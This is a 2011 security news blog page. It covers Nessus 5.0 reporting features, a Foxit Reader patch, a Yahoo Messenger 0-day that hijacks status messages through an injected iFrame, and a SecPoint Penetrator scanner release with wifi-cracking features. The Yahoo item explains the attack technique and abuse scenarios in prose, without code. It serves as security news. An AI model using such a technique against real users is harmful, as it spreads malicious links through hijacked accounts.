  • Example: During an internal scan, Nessus will report that a DNS server allows recursive queries, which is its function on the internal network. As this is a known condition, a user can suppress this result in the generated report to keep focus on true vulnerabilities.
  • With four new pre-configured report formats — Compliance Check, Compliance Check (Executive), Vulnerabilities by Host, and Vulnerabilities by Plugin — users can quickly create reports by chapters.
  • Example: The company’s compliance policy dictates that passwords be greater than ten characters in length. Nessus v5.0 runs a scan against the baseline, and the Compliance Check (Executive) report shows a pass/fail result to indicate if all hosts on the network are compliant with the minimum password length. With pass/fail results, the Compliance Check (Executive) report provides a quick snapshot of the company’s compliance checklist status.
  • Report formats: Reports can be generated in native Nessus formats, HTML, and now PDF formats (requires Oracle Java be installed on the Nessus server).
  • The new PDF report format makes it easier to share reports.
  • Combined reports: Multiple report templates can be combined into one report.
  • A single report can now contain vulnerabilities sorted by host and by IP address/hostname.

To Download Nessus click Here



SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Foxit Reader 5.1.3 Released, Critical Security Hole Patched

Posted by Avik Sarkar On 12/11/2011 10:26:00 pm


Popular PDF reader software Foxit Reader has released their next version. In this release they closes a critical security hole found by security specialist Secunia. Earlier in a report they said that the vulnerability on Foxit Reader can be exploited by malicious people to compromise a user's system. The vulnerability is caused due to an unspecified error.The issue was reported to the company early last month and versions up to and including Foxit Reader 5.1.0.1021 are affected; so now the users are advised to upgrade to 5.1.3 to fix the issue. For more information you can cheek the official press release


To Download Foxit Reader 5.1.3 Click Here


SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

0-Day Vulnerability in Yahoo Messenger, An Attacker Can Change The Status Update Remotely

Posted by Avik Sarkar On 12/04/2011 04:41:00 pm


Zero day exploit found in Yahoo messenger allowing attackers to change the status update remotely. Version 11.x of the Messenger client (including the freshly-released 11.5.0.152-us) is infected with this 0day vulnerability. The status message change occurs when an attacker simulates sending a file to a user. This action manipulates the $InlineAction parameter (responsible for the way the Messenger form displays the accept or deny the transfer) in order to load an iFrame which, when loaded, swaps the status message for the attacker's custom text. This status may also include a dubious link. This iFrame is sent as a regular message and comes from another Yahoo Instant Messenger user, even if the user is not in the victim’s contact list. The exploit delivers its payload when the attacker simulates sending a file to the user. The bogus file tricks Messenger into loading an iFrame that then swaps the status message for whatever garbage the attacker wants to load, including a potentially "dubious" link, as Bitdefender describes it. The iFrame comes over as a regular message from another Yahoo Instant Messenger user, even if the user isn't in the victim's contact list.

  • Why it is so dangerous? 
Status messages are highly efficient in terms of click-through rate, as they address a small group of friends. Chances are that, once displayed, they will be clicked by most contacts who see them. One scenario: the victim's status message is swapped with an attention-getting text that points to a page hosting a zero-day exploit targeting the IE browser, the locally installed Java or Flash environments or even a PDF bug, to mention only a few. Whenever a contact clicks on the victim’s status message, chances are they get infected without even knowing it. All this time, the victim is unaware that their status message has been hijacked.
Another lucrative approach to changed status messages is affiliate marketing (ie: sites that pay affiliates for visits or purchases through a custom link). Someone can easily set up an affiliate account, generate custom links for products in campaign, then massively target vulnerable YIM victims to change their status with the affiliate link. Then, they just wait for the contact-generated traffic to kick in. There are actually a couple of services that pay YIM users to change their status with custom links as part of their business.


  • Who is Safe?
You are running a Bitdefender security solution (Bitdefender Antivirus Plus, Bitdefender Internet Security or Bitdefender Total Security). We detect this threat via the HTTP scanner and block it before it reaches the Messenger application.
You have Yahoo Messenger set to “ignore anyone who is not in your Yahoo! Contacts“(which is off by default).


SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Penetrator Vulnerability Scanner 9.9 By SecPoint

Posted by Avik Sarkar On 12/02/2011 11:55:00 pm



One of the Leading IT-security company SecPoint has released a new version of its award-winning Penetrator to provide comprehensive protection to any businesses with a wireless network. The update includes powerful new applications to boost corporate security, such as a Google Hacking Database, to identify whether sensitive company information or files have been indexed by search engines; Improved Word Lists for cracking (now more than 1.1 billion entries); and an Easy Wifi Security Assessment to show whether a Wifi network is vulnerable. This release adds more than 50 improvements & the firmware is both for the Penetrator and the Portable Penetrator.

The New Version Includes :-
- Improved vhost scan
- Improved pdf download
- Improved speed for add IP
- New icon placed
- System status in admin area too.
- New customized menu items.
- Improved back and next features.
- Start scan speed improved.
- Report processing is improved.
- Xml report structure improved.
- Automatic Virtual host vhost domain scanning in new scans.
- Automatic Virtual host vhost domain scanning in new audit scans.
- Automatic Virtual host vhost domain scanning in new template scans.
- Improved system logs section option to delete pending scans.
- Improved IP Address settings process.
- Improved audit schedule.
- On Group scan page added audit text.
- Improved edit audit scan schedules.
- Automatic email when audit scans are completed.
- Updated back button.
- Improved Word List download.
- New more user friendly Icons.
- Improved cracking of multiple wifi networks.
- Added SYN port scan for bettering scanning of weak routers.
- Faster port scanning.
- Improved WPA/WPA2 cracking.
- And so on



For more information click Here



SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Related Posts Plugin for WordPress, Blogger...

Site search